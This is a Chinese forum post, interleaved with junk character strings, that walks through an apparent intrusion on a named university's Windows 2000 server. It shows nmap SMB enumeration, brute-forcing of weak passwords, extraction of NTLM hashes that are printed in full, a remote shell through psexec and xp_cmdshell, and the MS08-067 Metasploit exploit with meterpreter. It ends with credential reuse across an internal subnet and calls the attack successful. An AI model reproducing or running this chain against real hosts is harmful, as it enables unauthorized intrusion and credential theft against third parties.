广西师范网站http://202.103.242.241/
# w4 C( \/ H) l8 D, ` t1 d& \8 h+ Y: w; g1 }+ L4 |9 ?/ l* o) e
root@bt:~# nmap -sS -sV 202.103.242.241* D1 w& U( x+ H
0 z" v* H8 y0 P! Z! \Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
1 [: f8 z. B- c J; M3 G; e7 h1 i( K( E( T0 b
Nmap scan report for bogon (202.103.242.241)0 x3 k6 v9 ~5 }) P& f0 R+ A# s
6 ~) N$ S" _; l2 |& |Host is up (0.00048s latency).
- X2 C2 K8 ^8 s/ Z: h5 H5 A
/ a- [- {& ?$ r4 @' u/ e5 TNot shown: 993 closed ports a' z4 t- R! R( X' `6 M
, m9 Q) o7 {7 v" V* ?6 EPORT STATE SERVICE VERSION
+ F @- h0 u& j- i" H
" ?1 A9 E e! \2 z3 H135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& m2 q( u+ a* K. f" K. _) ^: B( h& X
139/tcp open netbios-ssn
) n) F4 {& Z! M; k, f9 P! T: V3 n( @5 w2 d0 |8 r) \: F+ c4 E1 a
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
3 X i6 U: Q1 V, Z& c/ t W9 o; Q: b5 o" {( p% P
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
) u- C# t- d( i: ^9 K
! h. ?" W* @' |1 ?8 Y! ]& S1026/tcp open msrpc Microsoft Windows RPC
; Z+ \" d! ~& g; j( C0 e" `3 |7 }' [; v7 H
3372/tcp open msdtc?
4 D) M9 D* k8 P8 y0 L0 ? d
+ O3 C! C( H2 M3389/tcp open ms-term-serv?
- Y+ Q' O$ e$ v( E3 r, r" w J5 E4 e: E' c* J
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :& F1 a0 l9 e3 l x! j
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
4 R+ z1 N& P7 F# l: c
4 x7 {! v) u( E" _0 U7 p& V+ ^SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions8 O: Z) U0 H# [# [
3 ~6 B/ v. v9 ^# `2 _: b8 w' ?
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
9 d: K, J/ H) }; Y ?8 y! E" S( B& _* d# v- U
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO8 O2 t; b) o2 e8 E+ U
0 B/ w: J3 V- J: Z) t! `& t
SF:ptions,6,”hO\n\x000Z”);
8 x$ ]% u' y5 P( Y8 f. x& q/ l. e+ `3 J; `
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
# `# G' s5 M! ~& I. d
, r& ^: L4 b* d1 |7 wService Info: OS: Windows" r( }1 i+ s- o+ N9 d- j8 Q
+ V& h3 J4 x1 zService detection performed. Please report any incorrect results at http://nmap.org/submit/ .7 n* S5 C4 G: \
! M8 e! l, A" s5 L6 [
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds% s% o6 M: t9 d% s/ E4 N9 C/ D
5 Z/ S- |, A0 E' H8 _; F* n! N
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本9 m, F \+ k: x/ k' w& c
; q& C) r) |0 ~-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse! U N" O6 h9 H0 v) S6 r
( N5 r$ f2 y5 ^) E) _- X; n" K) Q' u6 n
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse1 Q+ P5 V; ~& V. Z
1 d7 Q* t% _1 X% E; _3 c( y-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
0 I* l8 I4 Y2 B4 V
1 X8 ~& Y# f* m6 {-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
: h0 P' a e+ V: j n$ K% Y
( K, w7 i6 }6 U2 Q6 k-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse# Z) F6 K( |. U# k x
& \$ M# y, q" G4 `% U
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
# k' D+ r3 a$ ?' _* P1 `8 ?
* u5 H& }- [, W( L-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse. E$ B6 v% M' G- c4 G: ?0 I. S3 ?9 Z
4 E% l$ B; t% Z8 R9 \-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
, U& X& |/ C1 }6 X/ y: N! l. N+ _2 T4 \7 d H
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse2 Z3 B4 U* r% b7 i! T" D
: U& x8 A2 o' U/ K" D
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse) h: r- F8 N2 n! C U+ Z
; F) S9 W: R j
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse( m$ v; a5 y1 B& P# @
5 c& B: Q+ C0 Z5 M+ w6 x0 e
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse4 R* G$ }# G% {5 S. Z0 r" Z: J2 k; h
) r, \, K9 n1 G& {$ F: g; M-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, _; ` R- y# L, J+ D+ t6 q+ |7 l. l1 f5 R
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
/ n; A! {* @; i$ {
6 _' {0 L# `1 q5 O* \/ T2 m7 }-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
, d" @# m' t/ [/ Q" x" `! s( a, a8 s v! l+ R* h
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 1 c& u4 g5 X# m8 ^6 t: P( i) Y
; s+ ~$ x6 _8 K. e/ G# F* d//此乃使用脚本扫描远程机器所存在的账户名 H, O9 F0 u0 v& \/ L1 q( P
- `& `0 r( {; [( n4 s/ g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
0 ?2 ]# a, q" e# |# N
5 O! D' j& ]8 I8 o9 s9 @Nmap scan report for bogon (202.103.242.241)
: J( U: N ~1 G) A% Q4 ~; g
/ O! N" w7 \1 S) r5 r' t$ s4 VHost is up (0.00038s latency).( s. h7 t5 w, }( { Z; p) T
0 _# L& G5 r2 [8 [7 W) \3 G
Not shown: 993 closed ports
: m% E3 Q& N4 S- {6 q, X% M$ ~
7 X ~& Z2 Z3 t% g' ?PORT STATE SERVICE) e& |6 L) P8 @4 ]
3 a" \7 `9 a& o: b, t; f5 Z: r V135/tcp open msrpc$ k2 W$ K% Q7 h5 z* P9 Z; q5 P( W
4 ]& ^9 b) ?/ j0 s" E
139/tcp open netbios-ssn
. n: Z% t" \9 V1 b( O* k* K! b- i& b# K7 q! M
445/tcp open microsoft-ds$ c7 ?: k$ H8 y/ H8 H( @
! e2 Z/ u& v5 K: i& D
1025/tcp open NFS-or-IIS Y; F* ]! E! z- S: s
1 o. T4 u5 Z- {" ] P* p/ d; U7 \
1026/tcp open LSA-or-nterm; L, _+ f) \) V7 ]7 L) r
& \% i" B) x6 M' k6 x% O3 q- L3372/tcp open msdtc
d& ^7 e8 |* u
& e% A/ `- Z3 t( F6 Z( p3389/tcp open ms-term-serv
; G2 p, @4 y) k" a B+ ? R5 y0 [( n3 z8 ]; y9 U- } d/ S0 m
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 e+ y* Y" B0 a% W
! L' ^8 b% ?8 e( `+ uHost script results:5 j. ]' ]. x( G% t* f1 w
$ }, j4 t* @8 m! C| smb-enum-users:5 z c H) G; o# H* ]5 z* s
2 b3 C' r3 g$ @: K+ d|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果1 h3 q. \! D; K. C
- F$ ]6 _/ n$ F) U, N/ u C* y4 SNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
3 y/ R" g& A0 o- }% G) O0 ]5 G" R3 W: i6 k/ I2 r- ]2 H- x+ `( D
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ( P' o$ z, E4 m4 ^) c9 g
9 f* F& c7 N; [. d$ o% `: \' D' c
//查看共享7 g6 b$ E! x( `, |" K7 h
6 i4 I7 a8 u6 A9 k& R9 ^, ZStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST: A. y' m, k( M7 `
% w p0 u- D4 ?4 ]8 ]$ T# hNmap scan report for bogon (202.103.242.241)
8 f R% s% j: h& J) i0 N
% ~: D: g) I0 L( I" H. E0 _Host is up (0.00035s latency).! C. i+ P0 E7 n" T% h- n
( Z$ |& B U9 H" z6 n% p/ d
Not shown: 993 closed ports
4 ^$ T. {! y ~$ g
; `4 e/ a9 d2 d A+ @PORT STATE SERVICE
2 e& o- P3 u5 H
( T6 i* S% y. ]; A8 T" g7 w2 T135/tcp open msrpc
9 I; H& U7 c$ }+ t) y3 C! K' B+ q% g6 f) K4 e4 H5 @7 d& U! j
139/tcp open netbios-ssn& G8 x* Q/ e/ C) t! a1 z
: e" U0 [0 _* j, E1 _2 E445/tcp open microsoft-ds: ]. D$ ~* t J6 R, u
: L! _9 K& f# ^- h, T
1025/tcp open NFS-or-IIS
5 f _( B1 l0 M( t7 ^" O7 H; b8 T' G, h
1026/tcp open LSA-or-nterm
5 @ _' Z+ m/ Y" l3 }0 ]& o" E
) ^7 ~' y- M, ?! o3372/tcp open msdtc
. k3 S+ }5 Q8 U0 N' V7 F) C A
9 n% Y$ r9 ~: M/ V. H% r& t. }% w3389/tcp open ms-term-serv
6 y: I) X4 [, M6 l2 E( B1 G9 _8 k, U' j* ?) y. o1 H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! e6 \4 q: t$ q0 y7 p
& X& H+ x/ f& c4 u
Host script results:
! f+ `' D4 x1 ?1 C
O$ A' ^* |2 a. h; Q( ^| smb-enum-shares:: @; E+ @# P, Q
/ E! |6 E/ V2 g
| ADMIN$- p/ j; z) b) q* { H" M0 K: X
6 i8 A& @' @! x' D/ H! C
| Anonymous access: <none>
5 K8 `+ X7 n* y8 n2 g! j
. Z ]) h1 ^; J1 f) f- U6 C6 G: H| C$
. M# E0 E2 L' L2 {* d' n3 F Q/ L( T4 R" B
| Anonymous access: <none>
5 B9 F& H' f. S5 I2 K
+ Y- R* j, ^/ _4 G) {| IPC$
6 Y$ @" ?- C' h2 x& u' Y6 a, f5 g. H
|_ Anonymous access: READ
# Q% S4 ^6 z" Q
; @1 d4 r; B" n6 e rNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
( x& d2 A/ h, C5 b/ O8 z: \/ V# I" [/ P' O( h% v' q& U1 H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
1 b, b) J, m. O/ }5 a0 c9 v0 [$ k
//获取用户密码
- z8 O7 Q! R7 i, }+ @0 Y! u$ B
0 K+ ~) s2 f |1 x! xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST1 ^4 n6 r z0 G' Y3 H
4 |$ K* ?. {- g9 o( _* g- a- [Nmap scan report for bogon (202.103.242.2418)
- Q. W0 @, Z; b2 m& u* a8 K2 Y& W, _; Z F3 E
Host is up (0.00041s latency).
9 s3 e. f7 f" u2 k% U5 L5 ~2 V4 ]2 d8 l- z1 |
Not shown: 993 closed ports/ l& J% }& k9 H" L9 w
# e. w) J# b% R' LPORT STATE SERVICE
) Z. B/ I# x$ o# I! `5 h
" _( {3 s: g' w$ H% \135/tcp open msrpc& A+ n% V. k u4 a- m* x2 M
9 a; c6 }: w: S! P5 X139/tcp open netbios-ssn
A8 W# `6 e9 Q, m1 c6 O, v5 \6 v, S- u
445/tcp open microsoft-ds
4 [5 C9 J) L. W4 v0 ~9 G o6 h, g) v' E
1025/tcp open NFS-or-IIS" I; }; H6 z+ A
2 c7 ? s% I. Z- p( k% g0 m, a
1026/tcp open LSA-or-nterm
+ o1 M. Z# B9 x/ u; U& e; }0 u# @1 w6 X' ~) K
3372/tcp open msdtc4 k* _% n7 G) U0 u
1 Q& X6 E1 u3 k7 B+ d. h9 j/ g" c, }. Q
3389/tcp open ms-term-serv; S/ G4 y* @: H# y& ~6 C
; `5 W( |8 ]/ L) h; B' @MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 R. N+ k7 C4 E$ \, k7 s9 U+ U; k2 G d
* s+ o. h+ |+ v5 k- ]Host script results:
: e9 M& v( W! D6 ], r0 T- g2 O( ^/ }8 i1 K, a w; k
| smb-brute:- n# E! M6 t: H# x
$ C; v0 k- a; H3 `. a- f$ ]administrator:<blank> => Login was successful
1 M) u: A4 _$ U5 n; l- e" r
, T, |3 T; O# A3 I5 S, f|_ test:123456 => Login was successful
- f3 W% _# O, ^7 e- p: B ^ { g4 G) {
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
, u- T- I0 f1 f! ?- q, N, I' U3 ?. {& y `$ j
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash% F }' O; \% a6 |. M4 w2 r
: ^7 t6 S% H0 I+ o1 c1 U
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
' \6 U: O2 f5 F. g& h2 U% F) Z2 ^6 y/ L
7 G; Y2 P6 v& v4 nroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse8 }7 g" @* j, f7 T
+ r9 O1 o6 P# L) v4 S3 Iroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139% C0 {& v, h4 ?4 ]% ~) c
" @! s3 e c9 J: B% b( `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
4 Z! W5 O% V' S4 J. d' |
: b5 @/ N. G( k$ JNmap scan report for bogon (202.103.242.241)
2 [& h9 ?' @' }. B5 n. J4 B( w) I& t# Z
+ }6 A# |' {% R/ HHost is up (0.0012s latency).
/ j1 j/ H( j4 Y) ~8 ]3 P
$ G* x( y) A7 s3 _+ c. h; R2 N qPORT STATE SERVICE
1 R( [4 H$ S X( _. L8 @9 V! u) p% Y# u9 J6 m: t3 |% c2 I
135/tcp open msrpc
% O2 b9 T% G# l$ ?: Y: _& G& h9 e+ z
139/tcp open netbios-ssn( a& f3 w) ~3 {6 w( ]
. L: i w1 s0 H) z; {7 B445/tcp open microsoft-ds, ?# D2 K3 ~+ a
" S, X! a* @. c# g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ W) ]$ s7 G9 ~6 y
. q- Y" ^- M2 L# b! MHost script results:, u8 D: h1 z0 W9 w# C) P4 G
" N. U8 x* ?4 n0 z& s0 S2 Q
| smb-pwdump:. B1 X2 b$ V3 d: R' D
% C5 T- M& B" ]) N& e9 H| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
- M" W' e- S- I# h
) w6 \7 p% |$ k v) T+ f" I| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
5 v" v$ M- ]2 a) f @
2 |' w( M% f# l9 B| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
- O+ v$ b/ D: \" p/ _4 N4 r- Y# L3 K" D7 x6 a
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D27 u7 A a- e4 Z4 I
/ Y: H r8 m6 y; r2 P) c" UNmap done: 1 IP address (1 host up) scanned in 1.85 seconds! j9 ] E3 y0 m' H6 Y8 I. y8 w! q% T
. P; ^) Q- U7 @% a+ H+ L
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
) k/ t5 [7 r1 c) R2 g' S n7 R' r
u" M3 n: s- p- R3 o9 e$ t% \-p 123456 -e cmd.exe
7 t" ]( |. N% I* l# D( g. Q% c7 K+ n4 i7 L
PsExec v1.55 – Execute processes remotely
) J9 L. k$ p( {' T, L: N1 l7 S, u
Copyright (C) 2001-2004 Mark Russinovich
1 k' w I5 V$ T* y- m. c
, d6 R2 w+ s2 o6 H! p$ wSysinternals – www.sysinternals.com
3 u4 q0 P: o" h- o( v/ g
$ z/ b5 D& U5 W) N+ P IMicrosoft Windows 2000 [Version 5.00.2195]
$ S, i" a, P6 v1 r/ M5 M
% m* g$ b/ p& }4 R1 |% M(C) 版权所有 1985-2000 Microsoft Corp.
7 j) ~$ I# k3 N. Q
4 q3 ~+ G# ^3 G. V8 n' NC:\WINNT\system32>ipconfig
0 e3 v9 ~* O. b+ _7 @3 ^4 W
9 X' H4 E: E& [6 d0 L1 _& QWindows 2000 IP Configuration' _( y! r" J0 Y2 V/ ^
6 X9 W) |6 \8 F6 a$ G' y( g/ TEthernet adapter 本地连接:# G1 K) ]6 C# |: U2 Z! m
" o; e, Q4 I7 D+ }3 b- FConnection-specific DNS Suffix . :0 i5 T4 b* T2 i% I# D+ ]; [# w
3 l g2 t" [5 T/ K: N1 X; K
IP Address. . . . . . . . . . . . : 202.103.242.241$ z; B$ R6 z& f: v+ E/ O
4 e; r5 K9 \* |! e' ^Subnet Mask . . . . . . . . . . . : 255.255.255.0- s/ H1 J' x" }: i5 o
2 V) N- B3 y" K' }6 y" A; R6 x5 vDefault Gateway . . . . . . . . . : 202.103.1.1" S/ Y* F& y' F
3 B9 Y! p' Z* n7 m' |- D7 A
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
; Z" g/ F: I9 G( Y; v, Y- ]; ] L+ G9 h' h- r4 y" Z" g; w4 O0 K
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞9 l: l. g5 i- s. D# {' \+ w" P- g
# t4 B# v+ Y" D+ \" b# s+ {4 {) i U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
: s$ U$ W3 J5 r& X+ l0 b" c
/ @$ k9 J2 g# {6 }, n7 `Nmap scan report for bogon (202.103.242.241)
" Y- @9 N) l8 ]; a# n& `3 ?& v8 r+ V9 a
Host is up (0.00046s latency).
% n; s9 L3 K6 [3 f+ w+ K+ G0 a
' |5 n% \. l( L- u0 UNot shown: 993 closed ports8 i: a$ m [3 d8 X
7 {, j! _$ {4 xPORT STATE SERVICE8 r3 w- H8 E7 g) C3 q* H
5 a( q- h; K: ^& Y I w+ I" S135/tcp open msrpc
* g, C$ L6 J* w# s( P$ ~7 i6 v0 R8 B) {% j! c! i" P; ^( V
139/tcp open netbios-ssn3 n1 h7 S1 e2 e$ p1 O7 |
2 e( m. O( {, f$ F8 i
445/tcp open microsoft-ds4 b5 n2 r/ s3 Z# E0 ?
7 z+ O$ V- d' b0 G. C, S
1025/tcp open NFS-or-IIS
9 I- [9 R8 u) s3 e) Z% i6 ]" d" u0 }1 K) X
1026/tcp open LSA-or-nterm! P9 e& f1 d4 K! e- z( ~4 _4 K
# k- T C+ s# z# p* R. h
3372/tcp open msdtc% [( N# Q. f6 y( {" ^1 x
+ A) V: @" @( { u
3389/tcp open ms-term-serv3 N: h% O* b+ O- y6 h5 @; ^$ S
' E' `0 t9 a! d$ rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 Z' P$ ^& Z3 \3 G. G' g+ ]
5 w+ l* b; X* h9 {# F1 H( bHost script results:* z. n! B' D( r. |3 i) u- R- {
+ Q2 H+ d% G2 B y| smb-check-vulns:
) ^9 B) Y% ~5 e' d+ I' {3 @+ V
7 q8 k* C- ?/ [# X|_ MS08-067: VULNERABLE
1 ^( }2 ?$ @) u: u0 S
( {7 j9 u q: k1 T! Q( J% ^/ hNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
( G) A: l; f0 M+ r& B' B" |' F9 m
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
, M- D3 Y$ ?! r! }. T; A! q, ?! F9 c. P6 {/ M* Z4 t
msf > search ms08
* z2 k+ p$ v" b8 q w j7 j$ b1 b! {0 P6 y! y9 d- x5 q4 M, \( p7 t
msf > use exploit/windows/smb/ms08_067_netapi6 p8 m$ u; |+ ~
6 H4 V: n9 P) Z; x) R, A* V" ~6 Y
msf exploit(ms08_067_netapi) > show options+ N3 A3 h a( l9 }3 Q& l9 p6 F- X" X
( I& j: x- [- `. c2 y
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241* e2 w5 W/ X4 }& Z: H6 J
# H8 |$ N; t, Zmsf exploit(ms08_067_netapi) > show payloads4 B5 f1 s9 m9 L- K
9 o5 c4 J+ @+ _) fmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
, M; k5 P9 ] P. m% f6 {
: F* H. ?& a: h# i: omsf exploit(ms08_067_netapi) > exploit
7 Y8 L3 }3 n$ }8 I
2 E$ J: r8 x U1 C) j# M, Lmeterpreter >5 _7 G$ ^6 f0 ?- p5 ~2 t, P( ]# T
7 j, H# ^5 n/ L f; b, Y) PBackground session 2? [y/N] (ctrl+z); t5 U: {8 K0 n) h1 b. T/ D- G
, ~2 A5 I, k9 a& `7 A
msf exploit(ms08_067_netapi) > sessions -l: j# p0 ]' E4 j+ T# H
9 {- H+ q" Y5 ~! X5 `# E# x
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt" S" m! J+ r& |( p! L
4 G* G1 m; \/ Z
test" n1 W' O$ }+ @% T
: A7 `0 `7 f1 v+ {
administrator: V2 z, H$ i8 n& g! \! I/ c( U
W+ |: _5 f: P1 s9 @
root@bt:/usr/local/share/nmap/scripts# vim password.txt
" K# _: |! q1 b3 B) [4 {9 i( T7 q, ^4 K* X
44EFCE164AB921CAAAD3B435B51404EE
/ n9 j. a5 M C" v6 G2 @+ O
2 v& {9 h, G1 I% Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
" |( s9 E G% T# A" n, W4 p; q( q: y; z/ R2 P/ W: w
//利用用户名跟获取的hash尝试对整段内网进行登录
# c1 c% `8 p# |* s' J3 k4 o) q( D8 r% k, k
Nmap scan report for 192.168.1.105
" G. q! m% e5 S! _6 m$ G* K: N% f" o! D, M
Host is up (0.00088s latency). R& X; e! u3 Q! J* K, j( `+ n W
/ G5 j/ ~/ z) u. C4 l1 A& |% ]8 lNot shown: 993 closed ports
5 O. j+ d" U" P+ q1 {6 y7 H) q* f5 Y+ E8 r
PORT STATE SERVICE
& Y. \. i2 L1 s; Y$ F* B* q' ^( R3 x+ M
135/tcp open msrpc
3 |% Q& D) \% Y" e
5 Q, U" w& q0 W2 i; e. y139/tcp open netbios-ssn" x- { u v& d9 C+ `; a# s
( j. M7 K$ r! ?! r: h4 S% |
445/tcp open microsoft-ds
2 `) t! s2 f J
2 A5 T( F& `3 `! j. E; I1025/tcp open NFS-or-IIS! E3 u8 o! w3 ^- G: I' m$ ]* L! B! o5 [
# Z( g4 g1 |. \' n
1026/tcp open LSA-or-nterm
7 o- g0 ^5 `' n' q2 _
. S! ]! _8 j1 E1 w g; {3372/tcp open msdtc. |; k+ N9 {2 @7 P7 T
# `' G. {& T9 P9 z0 K! s( U
3389/tcp open ms-term-serv5 A, b8 b( U |' d4 p) [
# c; X$ v5 U' o+ N B8 x* ~MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& {# _7 F9 A: r
6 k/ W! o C% sHost script results:
3 K4 ~- h' y+ l2 O5 R5 A; x' N' G1 D
| smb-brute:5 Y" v4 O3 Z6 p$ r M' P* g# H; O v
" c c) D& l. L) x* H' J$ A% `
|_ administrator:<blank> => Login was successful
2 z7 F- E. C5 j3 \8 a2 l
. \8 ]$ c9 m& H; ]( Z# k8 }, l攻击成功,一个简单的msf+nmap攻击~~·
% _7 R K+ Q, Y) B1 K2 X& C5 }/ u# e$ v" x; _
|
发表于 2012-12-4 12:46:42
收藏
支持
反对